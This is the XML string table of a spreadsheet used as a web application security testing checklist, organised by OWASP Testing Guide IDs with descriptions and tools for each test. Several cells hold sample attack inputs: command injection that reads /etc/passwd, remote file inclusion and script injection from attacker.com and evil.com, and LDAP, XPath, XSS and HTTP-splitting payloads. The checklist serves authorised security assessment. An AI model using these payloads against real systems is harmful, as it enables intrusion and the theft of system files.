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bhavl\Documents\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7B403E1E-8289-4084-AAC4-5FF777E18144}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="12576" xr2:uid="{5F0C88E6-C444-4EDC-89DC-F80C2A3D675B}"/>
  </bookViews>
  <sheets>
    <sheet name="Web Application Checklist" sheetId="1" r:id="rId1"/>
    <sheet name="Network Security Checklist"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="715" uniqueCount="472">
  <si>
    <t>Information Gathering</t>
  </si>
  <si>
    <t>Test Name</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>Result</t>
  </si>
  <si>
    <t>Remark</t>
  </si>
  <si>
    <t>OTG-INFO-001</t>
  </si>
  <si>
    <t>Conduct Search Engine Discovery and Reconnaissance for Information Leakage</t>
  </si>
  <si>
    <t>Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.</t>
  </si>
  <si>
    <t>Not Started</t>
  </si>
  <si>
    <t>OTG-INFO-002</t>
  </si>
  <si>
    <t>Fingerprint Web Server</t>
  </si>
  <si>
    <t>Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using
"HTTP header field ordering" and "Malformed requests test".</t>
  </si>
  <si>
    <t>OTG-INFO-003</t>
  </si>
  <si>
    <t>Review Webserver Metafiles for Information Leakage</t>
  </si>
  <si>
    <t>Analyze robots.txt and identify &lt;META&gt; Tags from website.</t>
  </si>
  <si>
    <t>Browser, curl, wget</t>
  </si>
  <si>
    <t>OTG-INFO-004</t>
  </si>
  <si>
    <t>Enumerate Applications on Webserver</t>
  </si>
  <si>
    <t>Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers</t>
  </si>
  <si>
    <t>OTG-INFO-005</t>
  </si>
  <si>
    <t>Review Webpage Comments and Metadata for Information Leakage</t>
  </si>
  <si>
    <t>Find sensitive information from webpage comments and Metadata on source code.</t>
  </si>
  <si>
    <t>OTG-INFO-006</t>
  </si>
  <si>
    <t>Identify application entry points</t>
  </si>
  <si>
    <t>Identify from hidden fields, parameters, methods HTTP header analysis</t>
  </si>
  <si>
    <t>OTG-INFO-007</t>
  </si>
  <si>
    <t>Map execution paths through application</t>
  </si>
  <si>
    <t>Map the target application and understand the principal workflows.</t>
  </si>
  <si>
    <t>OTG-INFO-008</t>
  </si>
  <si>
    <t>Fingerprint Web Application Framework</t>
  </si>
  <si>
    <t>Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.</t>
  </si>
  <si>
    <t>Whatweb, BlindElephant, Wappalyzer</t>
  </si>
  <si>
    <t>OTG-INFO-009</t>
  </si>
  <si>
    <t>Fingerprint Web Application</t>
  </si>
  <si>
    <t>Identify the web application and version to determine known vulnerabilities and the appropriate exploits.</t>
  </si>
  <si>
    <t>Whatweb, BlindElephant, Wappalyzer, CMSmap</t>
  </si>
  <si>
    <t>OTG-INFO-010</t>
  </si>
  <si>
    <t>Map Application Architecture</t>
  </si>
  <si>
    <t>Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database</t>
  </si>
  <si>
    <t>Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t>OTG-CONFIG-001</t>
  </si>
  <si>
    <t>Test Network/Infrastructure Configuration</t>
  </si>
  <si>
    <t>OTG-CONFIG-002</t>
  </si>
  <si>
    <t>Test Application Platform Configuration</t>
  </si>
  <si>
    <t>Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.</t>
  </si>
  <si>
    <t>Browser, Nikto</t>
  </si>
  <si>
    <t>OTG-CONFIG-003</t>
  </si>
  <si>
    <t>Test File Extensions Handling for Sensitive Information</t>
  </si>
  <si>
    <t>OTG-CONFIG-004</t>
  </si>
  <si>
    <t>Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename</t>
  </si>
  <si>
    <t>OTG-CONFIG-005</t>
  </si>
  <si>
    <t>Enumerate Infrastructure and Application Admin Interfaces</t>
  </si>
  <si>
    <t>OTG-CONFIG-006</t>
  </si>
  <si>
    <t>Test HTTP Methods</t>
  </si>
  <si>
    <t>Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST</t>
  </si>
  <si>
    <t>OTG-CONFIG-007</t>
  </si>
  <si>
    <t>Test HTTP Strict Transport Security</t>
  </si>
  <si>
    <t>Identify HSTS header on Web server through HTTP response header. 
curl -s -D- https://domain.com/ | grep Strict</t>
  </si>
  <si>
    <t>OTG-CONFIG-008</t>
  </si>
  <si>
    <t>Test RIA cross domain policy</t>
  </si>
  <si>
    <t>Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.</t>
  </si>
  <si>
    <t>Identity Management Testing</t>
  </si>
  <si>
    <t>OTG-IDENT-001</t>
  </si>
  <si>
    <t>Test Role Definitions</t>
  </si>
  <si>
    <t>Validate the system roles defined within the application by creating permission matrix.</t>
  </si>
  <si>
    <t>OTG-IDENT-002</t>
  </si>
  <si>
    <t>Test User Registration Process</t>
  </si>
  <si>
    <t>OTG-IDENT-003</t>
  </si>
  <si>
    <t>Test Account Provisioning Process</t>
  </si>
  <si>
    <t>Determine which roles are able to provision users and what sort of
accounts they can provision.</t>
  </si>
  <si>
    <t>OTG-IDENT-004</t>
  </si>
  <si>
    <t>Testing for Account Enumeration and Guessable User Account</t>
  </si>
  <si>
    <t>Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)</t>
  </si>
  <si>
    <t>OTG-IDENT-005</t>
  </si>
  <si>
    <t>Testing for Weak or unenforced username policy</t>
  </si>
  <si>
    <t>User account names are often highly structured (e.g. Joe Bloggs
account name is jbloggs and Fred Nurks account name is fnurks)
and valid account names can easily be guessed.</t>
  </si>
  <si>
    <t>OTG-IDENT-006</t>
  </si>
  <si>
    <t>Test Permissions of Guest/Training Accounts</t>
  </si>
  <si>
    <t>Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.</t>
  </si>
  <si>
    <t>OTG-IDENT-007</t>
  </si>
  <si>
    <t>Test Account Suspension/Resumption Process</t>
  </si>
  <si>
    <t>Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.</t>
  </si>
  <si>
    <t>Authentication Testing</t>
  </si>
  <si>
    <t>OTG-AUTHN-001</t>
  </si>
  <si>
    <t>Testing for Credentials Transported over an Encrypted Channel</t>
  </si>
  <si>
    <t>OTG-AUTHN-002</t>
  </si>
  <si>
    <t>Testing for default credentials</t>
  </si>
  <si>
    <t>Testing for default credentials of common applications, Testing for default password of new accounts.</t>
  </si>
  <si>
    <t>OTG-AUTHN-003</t>
  </si>
  <si>
    <t>Testing for Weak lock out mechanism</t>
  </si>
  <si>
    <t>Evaluate the account lockout mechanism’s ability to mitigate
brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.</t>
  </si>
  <si>
    <t>Browser</t>
  </si>
  <si>
    <t>OTG-AUTHN-004</t>
  </si>
  <si>
    <t>Testing for bypassing authentication schema</t>
  </si>
  <si>
    <t>Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection</t>
  </si>
  <si>
    <t>OTG-AUTHN-005</t>
  </si>
  <si>
    <t>Test remember password functionality</t>
  </si>
  <si>
    <t>Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?</t>
  </si>
  <si>
    <t>OTG-AUTHN-006</t>
  </si>
  <si>
    <t>Testing for Browser cache weakness</t>
  </si>
  <si>
    <t>Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
  </si>
  <si>
    <t>OTG-AUTHN-007</t>
  </si>
  <si>
    <t>Testing for Weak password policy</t>
  </si>
  <si>
    <t>Determine the resistance of the application against brute force
password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of
passwords.</t>
  </si>
  <si>
    <t>OTG-AUTHN-008</t>
  </si>
  <si>
    <t>Testing for Weak security question/answer</t>
  </si>
  <si>
    <t>Testing for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)</t>
  </si>
  <si>
    <t>OTG-AUTHN-009</t>
  </si>
  <si>
    <t>Testing for weak password change or reset functionalities</t>
  </si>
  <si>
    <t>Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?</t>
  </si>
  <si>
    <t>OTG-AUTHN-010</t>
  </si>
  <si>
    <t>Testing for Weaker authentication in alternative channel</t>
  </si>
  <si>
    <t>Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)</t>
  </si>
  <si>
    <t xml:space="preserve">Authorization Testing </t>
  </si>
  <si>
    <t>OTG-AUTHZ-001</t>
  </si>
  <si>
    <t>Testing Directory traversal/file include</t>
  </si>
  <si>
    <t>OTG-AUTHZ-002</t>
  </si>
  <si>
    <t>Testing for bypassing authorization schema</t>
  </si>
  <si>
    <t>Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)</t>
  </si>
  <si>
    <t>OTG-AUTHZ-003</t>
  </si>
  <si>
    <t>Testing for Privilege Escalation</t>
  </si>
  <si>
    <t>Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1</t>
  </si>
  <si>
    <t>OTG-AUTHZ-004</t>
  </si>
  <si>
    <t>Testing for Insecure Direct Object References</t>
  </si>
  <si>
    <t>Force changing parameter value (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t>Session Management Testing</t>
  </si>
  <si>
    <t>OTG-SESS-001</t>
  </si>
  <si>
    <t>Testing for Bypassing Session Management Schema</t>
  </si>
  <si>
    <t>SessionID analysis prediction, unencrypted cookie transport, brute-force.</t>
  </si>
  <si>
    <t>OTG-SESS-002</t>
  </si>
  <si>
    <t>Testing for Cookies attributes</t>
  </si>
  <si>
    <t>Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.</t>
  </si>
  <si>
    <t>OTG-SESS-003</t>
  </si>
  <si>
    <t>Testing for Session Fixation</t>
  </si>
  <si>
    <t>The application doesn't renew the cookie after a successfully user authentication.</t>
  </si>
  <si>
    <t>OTG-SESS-004</t>
  </si>
  <si>
    <t>Testing for Exposed Session Variables</t>
  </si>
  <si>
    <t>Encryption &amp; Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?</t>
  </si>
  <si>
    <t>OTG-SESS-005</t>
  </si>
  <si>
    <t>Testing for Cross Site Request Forgery</t>
  </si>
  <si>
    <t>URL analysis, Direct access to functions without any token.</t>
  </si>
  <si>
    <t>OTG-SESS-006</t>
  </si>
  <si>
    <t>Testing for logout functionality</t>
  </si>
  <si>
    <t>Check reuse session after logout both server-side and SSO.</t>
  </si>
  <si>
    <t>OTG-SESS-007</t>
  </si>
  <si>
    <t>Test Session Timeout</t>
  </si>
  <si>
    <t>Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.</t>
  </si>
  <si>
    <t>OTG-SESS-008</t>
  </si>
  <si>
    <t>Testing for Session puzzling</t>
  </si>
  <si>
    <t>The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.</t>
  </si>
  <si>
    <t>Data Validation Testing</t>
  </si>
  <si>
    <t>OTG-INPVAL-001</t>
  </si>
  <si>
    <t>Testing for Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t>Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.</t>
  </si>
  <si>
    <t>OTG-INPVAL-002</t>
  </si>
  <si>
    <t>Testing for Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF</t>
  </si>
  <si>
    <t>OTG-INPVAL-003</t>
  </si>
  <si>
    <t>Testing for HTTP Verb Tampering</t>
  </si>
  <si>
    <t>Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.</t>
  </si>
  <si>
    <t>netcat</t>
  </si>
  <si>
    <t>OTG-INPVAL-004</t>
  </si>
  <si>
    <t>Testing for HTTP Parameter pollution</t>
  </si>
  <si>
    <t>Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP</t>
  </si>
  <si>
    <t>ZAP, HPP Finder (Chrome Plugin)</t>
  </si>
  <si>
    <t>OTG-INPVAL-005</t>
  </si>
  <si>
    <t>Testing for SQL Injection</t>
  </si>
  <si>
    <t>Union, Boolean, Error based, Out-of-band, Time delay.</t>
  </si>
  <si>
    <t>Oracle Testing</t>
  </si>
  <si>
    <t>Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection</t>
  </si>
  <si>
    <t>Orascan, SQLInjector</t>
  </si>
  <si>
    <t>MySQL Testing</t>
  </si>
  <si>
    <t>Identify MySQL version, Single quote, Information_schema, Read/Write file.</t>
  </si>
  <si>
    <t>SQL Server Testing</t>
  </si>
  <si>
    <t>Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)</t>
  </si>
  <si>
    <t>SQLMap, SQLninja, Power Injector</t>
  </si>
  <si>
    <t>Testing PostgreSQL</t>
  </si>
  <si>
    <t>Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)</t>
  </si>
  <si>
    <t>SQLMap</t>
  </si>
  <si>
    <t>MS Access Testing</t>
  </si>
  <si>
    <t>Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.</t>
  </si>
  <si>
    <t>Testing for NoSQL injection</t>
  </si>
  <si>
    <t>Identify NoSQL databases, Pass special characters (' " \ ; { } ), Attack with reserved variable name, operator.</t>
  </si>
  <si>
    <t>NoSQLMap</t>
  </si>
  <si>
    <t>OTG-INPVAL-006</t>
  </si>
  <si>
    <t>Testing for LDAP Injection</t>
  </si>
  <si>
    <t>/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password</t>
  </si>
  <si>
    <t>OTG-INPVAL-007</t>
  </si>
  <si>
    <t>Testing for ORM Injection</t>
  </si>
  <si>
    <t>Testing ORM injection is identical to SQL injection testing</t>
  </si>
  <si>
    <t>Hibernate, Nhibernate</t>
  </si>
  <si>
    <t>OTG-INPVAL-008</t>
  </si>
  <si>
    <t>Testing for XML Injection</t>
  </si>
  <si>
    <t>Check with XML Meta Characters
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG</t>
  </si>
  <si>
    <t>OTG-INPVAL-009</t>
  </si>
  <si>
    <t>Testing for SSI Injection</t>
  </si>
  <si>
    <t>• Presense of .shtml extension
• Check for these characters
&lt; ! # = / . " - &gt; and [a-zA-Z0-9]
• include String = &lt;!--#include virtual="/etc/passwd" --&gt;</t>
  </si>
  <si>
    <t>OTG-INPVAL-010</t>
  </si>
  <si>
    <t>Testing for XPath Injection</t>
  </si>
  <si>
    <t>Check for XML error enumeration by supplying a single quote (')
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t>OTG-INPVAL-011</t>
  </si>
  <si>
    <t>IMAP/SMTP Injection</t>
  </si>
  <si>
    <t>• Identifying vulnerable parameters with special characters
(i.e.: \, ‘, “, @, #, !, |)
• Understanding the data flow and deployment structure of the client
• IMAP/SMTP command injection (Header, Body, Footer)</t>
  </si>
  <si>
    <t>OTG-INPVAL-012</t>
  </si>
  <si>
    <t>Testing for Code Injection</t>
  </si>
  <si>
    <t>Enter OS commands in the input field.
?arg=1; system('id')</t>
  </si>
  <si>
    <t>Testing for Local File Inclusion</t>
  </si>
  <si>
    <t>LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)</t>
  </si>
  <si>
    <t>Testing for Remote File Inclusion</t>
  </si>
  <si>
    <t>RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page</t>
  </si>
  <si>
    <t>OTG-INPVAL-013</t>
  </si>
  <si>
    <t>Testing for Command Injection</t>
  </si>
  <si>
    <t>Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.
%3Bcat%20/etc/passwd
test.pdf+|+Dir C:\</t>
  </si>
  <si>
    <t>OTG-INPVAL-014</t>
  </si>
  <si>
    <t>Testing for Buffer overflow</t>
  </si>
  <si>
    <t>• Testing for heap overflow vulnerability
• Testing for stack overflow vulnerability
• Testing for format string vulnerability</t>
  </si>
  <si>
    <t>Immunity Canvas, Spike, MSF, Nessus</t>
  </si>
  <si>
    <t>Testing for Heap overflow</t>
  </si>
  <si>
    <t>Testing for Stack overflow</t>
  </si>
  <si>
    <t>Testing for Format string</t>
  </si>
  <si>
    <t>OTG-INPVAL-015</t>
  </si>
  <si>
    <t>Testing for incubated vulnerabilities</t>
  </si>
  <si>
    <t>File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)</t>
  </si>
  <si>
    <t>OTG-INPVAL-016</t>
  </si>
  <si>
    <t>Testing for HTTP Splitting/Smuggling</t>
  </si>
  <si>
    <t>param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a&lt;html&gt;Sorry,%20System%20Down&lt;/html&gt;</t>
  </si>
  <si>
    <t>Error Handling</t>
  </si>
  <si>
    <t>OTG-ERR-001</t>
  </si>
  <si>
    <t>Analysis of Error Codes</t>
  </si>
  <si>
    <t>Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)</t>
  </si>
  <si>
    <t>OTG-ERR-002</t>
  </si>
  <si>
    <t>Analysis of Stack Traces</t>
  </si>
  <si>
    <t>• Invalid Input / Empty inputs
• Input that contains non alphanumeric characters or query syn
tax
• Access to internal pages without authentication
• Bypassing application flow</t>
  </si>
  <si>
    <t>Cryptography</t>
  </si>
  <si>
    <t>OTG-CRYPST-001</t>
  </si>
  <si>
    <t>Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection</t>
  </si>
  <si>
    <t>Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)</t>
  </si>
  <si>
    <t>testssl.sh, SSL Breacher</t>
  </si>
  <si>
    <t>OTG-CRYPST-002</t>
  </si>
  <si>
    <t>Testing for Padding Oracle</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</si>
  <si>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</si>
  <si>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OTG-CRYPST-003</t>
  </si>
  <si>
    <t>Testing for Sensitive information sent via unencrypted channels</t>
  </si>
  <si>
    <t>Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)</t>
  </si>
  <si>
    <t>Business logic Testing</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-001</t>
  </si>
  <si>
    <t>Test Business Logic Data Validation</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for data entry points or hand off points between systems or software.
• Once found try to insert logically invalid data into the application/system. </t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-002</t>
  </si>
  <si>
    <t>Test Ability to Forge Requests</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for guessable, predictable or hidden functionality of fields.
• Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow. </t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-003</t>
  </si>
  <si>
    <t>Test Integrity Checks</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</si>
  <si>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</si>
  <si>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OTG-BUSLOGIC-004</t>
  </si>
  <si>
    <t>Test for Process Timing</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</si>
  <si>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</si>
  <si>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OTG-BUSLOGIC-005</t>
  </si>
  <si>
    <t>Test Number of Times a Function Can be Used Limits</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</si>
  <si>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</si>
  <si>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OTG-BUSLOGIC-006</t>
  </si>
  <si>
    <t>Testing for the Circumvention of Work Flows</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</si>
  <si>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</si>
  <si>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OTG-BUSLOGIC-007</t>
  </si>
  <si>
    <t>Test Defenses Against Application Mis-use</t>
  </si>
  <si>
    <t>Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-008</t>
  </si>
  <si>
    <t>Test Upload of Unexpected File Types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</si>
  <si>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</si>
  <si>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OTG-BUSLOGIC-009</t>
  </si>
  <si>
    <t>Test Upload of Malicious Files</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</si>
  <si>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</si>
  <si>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Client Side Testing</t>
  </si>
  <si>
    <t>OTG-CLIENT-001</t>
  </si>
  <si>
    <t>Testing for DOM based Cross Site Scripting</t>
  </si>
  <si>
    <t>Test for the user inputs obtained from client-side JavaScript Objects</t>
  </si>
  <si>
    <t>OTG-CLIENT-002</t>
  </si>
  <si>
    <t>Testing for JavaScript Execution</t>
  </si>
  <si>
    <t>Inject JavaScript code:
www.victim.com/?javascript:alert(1)</t>
  </si>
  <si>
    <t>OTG-CLIENT-003</t>
  </si>
  <si>
    <t>Testing for HTML Injection</t>
  </si>
  <si>
    <t>Send malicious HTML code:
?user=&lt;img%20src='aaa'%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>OTG-CLIENT-004</t>
  </si>
  <si>
    <t>Testing for Client Side URL Redirect</t>
  </si>
  <si>
    <t xml:space="preserve">Modify untrusted URL input to a malicious site: (Open Redirect)
?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t>OTG-CLIENT-005</t>
  </si>
  <si>
    <t>Testing for CSS Injection</t>
  </si>
  <si>
    <t>Inject code in the CSS context :
•  www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
•  www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)</t>
  </si>
  <si>
    <t>OTG-CLIENT-006</t>
  </si>
  <si>
    <t>Testing for Client Side Resource Manipulation</t>
  </si>
  <si>
    <t>External JavaScript could be easily injected in the trusted web site
www.victim.com/#http://evil.com/js.js</t>
  </si>
  <si>
    <t>OTG-CLIENT-007</t>
  </si>
  <si>
    <t>Test Cross Origin Resource Sharing</t>
  </si>
  <si>
    <t>Check the HTTP headers in order to understand how CORS is
used (Origin Header)</t>
  </si>
  <si>
    <t>OTG-CLIENT-008</t>
  </si>
  <si>
    <t>Testing for Cross Site Flashing</t>
  </si>
  <si>
    <t>Decompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evil</t>
  </si>
  <si>
    <t>FlashBang, Flare, Flasm, SWFScan, SWF Intruder</t>
  </si>
  <si>
    <t>OTG-CLIENT-009</t>
  </si>
  <si>
    <t>Testing for Clickjacking</t>
  </si>
  <si>
    <t>Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.</t>
  </si>
  <si>
    <t>OTG-CLIENT-010</t>
  </si>
  <si>
    <t>Testing WebSockets</t>
  </si>
  <si>
    <t>Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.Use Google Chrome's Developer Tools to view the Network WebSocket communication. Check Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization</t>
  </si>
  <si>
    <t>OTG-CLIENT-011</t>
  </si>
  <si>
    <t>Test Web Messaging</t>
  </si>
  <si>
    <t>Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains</t>
  </si>
  <si>
    <t>OTG-CLIENT-012</t>
  </si>
  <si>
    <t>Test Local Storage</t>
  </si>
  <si>
    <t>Determine whether the website is storing sensitive data in the storage. XSS in localstorage 
http://server/StoragePOC.html#&lt;img src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>Web Application Security Checklist</t>
  </si>
  <si>
    <t>Google Dorks, Sitedigger, Shodan, FOCA, Punkspider, DuckDuckGo</t>
  </si>
  <si>
    <t>Httprint, Httprecon, BurpSuite, Nmap</t>
  </si>
  <si>
    <t>Browser, curl, wget, Google WebMaster Tools, BurpSuite</t>
  </si>
  <si>
    <t>Webhosting.info, dnsrecon, nslookup, fierce, Recon-ng, Intrigue, GoBuster, Search Engines</t>
  </si>
  <si>
    <t>Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP, SSH in order to identify known vulnerabilities.</t>
  </si>
  <si>
    <t>Nessus, Nmap</t>
  </si>
  <si>
    <t>Find important file, information (.asa, .inc, php, test, dev, sql ,zip, tar, pdf, txt, java, .bak etc)</t>
  </si>
  <si>
    <t>Browser, Nikto, wget, curl</t>
  </si>
  <si>
    <t>Review Backup and Unreferenced Files for Sensitive Information</t>
  </si>
  <si>
    <t>Nessus, Nikto, Wikto, Xeno</t>
  </si>
  <si>
    <t>Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, /phpmyadmin etc), alternative server port (Tomcat/8080, Apache, Jenkins)</t>
  </si>
  <si>
    <t>netcat, curl, nmap HTTP methods script</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Tamper data, Fiddler</t>
  </si>
  <si>
    <t>Burp Suite, ZAP</t>
  </si>
  <si>
    <t>Burp Suite, dirb, Gobuster, fuzzdb, Tilde Scanner, Hydra</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, curl</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Nikto, W3af</t>
  </si>
  <si>
    <t>Browser, Burp Suite, ZAP</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Hydra</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Firefox add-on CacheViewer2</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Wfuzz</t>
  </si>
  <si>
    <t>Burp Suite (Autorize), ZAP</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Liffy, Panoptic</t>
  </si>
  <si>
    <t>Burp Suite, fimap, Liffy</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Commix</t>
  </si>
  <si>
    <t>Burp Suite, BeEF, MSF</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, netcat</t>
  </si>
  <si>
    <t>Burp Suite, DOMinator</t>
  </si>
  <si>
    <t>Burp Suite, ClickjackingTool</t>
  </si>
  <si>
    <t>Burp Suite, Chrome, ZAP, WebSocket Client</t>
  </si>
  <si>
    <t>Chrome, Firebug, Burp Suite, ZAP</t>
  </si>
  <si>
    <t>OTG-CONFIG-009</t>
  </si>
  <si>
    <t>Test File Permission</t>
  </si>
  <si>
    <t>Analyse the permissions of certain files like executables, log files, temp files, upload files</t>
  </si>
  <si>
    <t>Windows AccessEnum, Linux namei</t>
  </si>
  <si>
    <t>OTG-CONFIG-010</t>
  </si>
  <si>
    <t>Test Subdomain Takeover</t>
  </si>
  <si>
    <t>Analyse the DNS server subdomain records and the external services/endpoints on the same</t>
  </si>
  <si>
    <t>dig, recon-ng, theHarvester, Sublist3r, dnsrecon, Amass</t>
  </si>
  <si>
    <t>OTG-CONFIG-011</t>
  </si>
  <si>
    <t>Test Cloud Storage</t>
  </si>
  <si>
    <t>Assess the cloud storage for any improper access control configuration</t>
  </si>
  <si>
    <t>AWS Command Line Interface</t>
  </si>
  <si>
    <t>Burp Suite(Spider tool), ZAP</t>
  </si>
  <si>
    <t>Verify that the identity requirements for user registration are aligned
with business and security requirements and verify the registration process</t>
  </si>
  <si>
    <t>Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS and if one can exploit it</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, mitmproxy, Wireshark, TCPDump</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Hydra, Nikto</t>
  </si>
  <si>
    <t>dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion, URL Encoding</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Wfuzz, DotDotPwn, GoBuster</t>
  </si>
  <si>
    <t>Burp Suite, ForceSSL, CookieDigger, JHijack</t>
  </si>
  <si>
    <t>Burp Suite, Firesheep for Firefox, EditthisCookie for Chrome</t>
  </si>
  <si>
    <t>Burp Suite, Jhijack</t>
  </si>
  <si>
    <t>Burp Suite (csrf_token_detect), CSRF Tester, Pinata-csrf-tool, ZAP</t>
  </si>
  <si>
    <t>Burp Suite(Repeater Functionality)</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Xenotix XSS, PHP Charset Encoder, HackVector, rat proxy</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, BeEF, XSS Proxy, XSS Assistant</t>
  </si>
  <si>
    <t>Burp Suite (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB), bsqlbf</t>
  </si>
  <si>
    <t>SQLMap, Mysqloit, Power Injector, sqlbftools</t>
  </si>
  <si>
    <t>Burp Suite, Softerra LDAP Browser</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, grep in command line</t>
  </si>
  <si>
    <t>Ollydbg, Spike, Brute Force Binary Tester</t>
  </si>
  <si>
    <t>OTG-INPVAL-017</t>
  </si>
  <si>
    <t>Testing for HTTP Incoming Requests</t>
  </si>
  <si>
    <t>Monitor all incoming and outgoing HTTP requests to the web server to inspect any suspicious activity and that there are no changes in the request from the endpoints</t>
  </si>
  <si>
    <t>Fiddler, TCPProxy, Charles Web Debugging Proxy, Wireshark, replayproxy, Ostinato</t>
  </si>
  <si>
    <t>OTG-INPVAL-018</t>
  </si>
  <si>
    <t>Testing for Host Header Injection</t>
  </si>
  <si>
    <t>Testing the host header for injection of malicious redirects, web cache poisoning, and for manipulation of password reset functionality</t>
  </si>
  <si>
    <t>Burp Suite, Browser</t>
  </si>
